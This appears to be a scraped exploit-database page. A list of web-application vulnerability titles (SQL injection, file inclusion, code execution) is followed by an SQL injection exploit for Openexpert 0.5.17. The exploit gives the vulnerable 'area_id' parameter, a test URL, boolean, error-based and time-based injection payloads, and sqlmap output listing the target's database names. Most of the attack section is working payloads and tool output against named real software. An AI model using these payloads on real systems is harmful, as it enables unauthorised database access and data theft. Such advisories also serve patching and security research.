
4 new exploits MkPortal 1.1.1 reviews / Gallery modules - SQL Injection MKPortal 1.1.1 reviews / Gallery modules - SQL Injection Joomla! Component GigCalendar 1.0 - SQL Injection Joomla! Component gigCalendar 1.0 - SQL Injection Joomla! Component RD-Autos 1.5.5 - 'id' SQL Injection mkportal 1.2.1 - Multiple Vulnerabilities Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection Free Bible Search PHP Script - 'readbible.php' SQL Injection Joomla! Component RD-Autos 1.5.5 - SQL Injection MKPortal 1.2.1 - Multiple Vulnerabilities Blue Eye CMS 1.0.0 - 'clanek' Parameter Blind SQL Injection Free Bible Search PHP Script - SQL Injection Simple PHP NewsLetter 1.5 - (olang) Local File Inclusion Simple PHP NewsLetter 1.5 - Local File Inclusion Joomla! Component Gigcal 1.x - 'id' SQL Injection Joomla! Component Gigcal 1.x - 'id' Parameter SQL Injection SCMS 1 - 'index.php p' Local File Inclusion SCMS 1 - Local File Inclusion Max.Blog 1.0.6 - (show_post.php) SQL Injection Max.Blog 1.0.6 - 'show_post.php' SQL Injection Max.Blog 1.0.6 - (submit_post.php) SQL Injection Max.Blog 1.0.6 - (offline_auth.php) Offline Authentication Bypass Max.Blog 1.0.6 - 'submit_post.php' SQL Injection Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass Joomla! Component com_simplefaq - 'catid' Blind SQL Injection Joomla! Component com_simplefaq - 'catid' Parameter Blind SQL Injection dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities dirLIST 0.3.0 - Local File Inclusion dirLIST 0.3.0 - Arbitrary File Upload BoZoN 2.4 - Remote Code Execution Check Box 2016 Q2 Survey - Multiple Vulnerabilities Openexpert 0.5.17 - SQL Injection
48 lines
1.6 KiB
Text
Executable file
48 lines
1.6 KiB
Text
Executable file
# Title : Openexpert 0.5.17 - Sql Injection
|
|
# Author: Nassim Asrir
|
|
# Author Company: Henceforth
|
|
# Tested on: Winxp sp3 - win7
|
|
# Vendor: https://sourceforge.net/projects/law-expert/
|
|
# Download Software: https://sourceforge.net/projects/law-expert/files/
|
|
|
|
#################################################
|
|
|
|
## About The Product : ##
|
|
|
|
OpenExpert. Dual use Web based and Easy to Use Expert System or Education System.
|
|
|
|
## Vulnerability : ##
|
|
|
|
- Vulnerable Parametre : area_id
|
|
|
|
- HTTP Method : GET
|
|
|
|
- To exploit it : http://HOST/expert_wizard.php?area_id=1'
|
|
|
|
- Sqlmap Output :
|
|
|
|
Parameter: area_id (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: area_id=1 AND 4961=4961
|
|
|
|
Type: error-based
|
|
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
|
Payload: area_id=1 AND (SELECT 8855 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(8855=8855,1))),0x71626b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind
|
|
Payload: area_id=1 AND SLEEP(5)
|
|
---
|
|
[15:35:38] [INFO] the back-end DBMS is MySQL
|
|
web server operating system: Windows
|
|
web application technology: Apache 2.4.23, PHP 5.6.26
|
|
back-end DBMS: MySQL >= 5.0
|
|
[15:35:38] [INFO] fetching database names
|
|
[15:35:39] [INFO] the SQL query used returns 5 entries
|
|
[15:35:39] [INFO] retrieved: information_schema
|
|
[15:35:39] [INFO] retrieved: mysql
|
|
[15:35:39] [INFO] retrieved: performance_schema
|
|
[15:35:39] [INFO] retrieved: sys
|
|
[15:35:39] [INFO] retrieved: test
|
|
|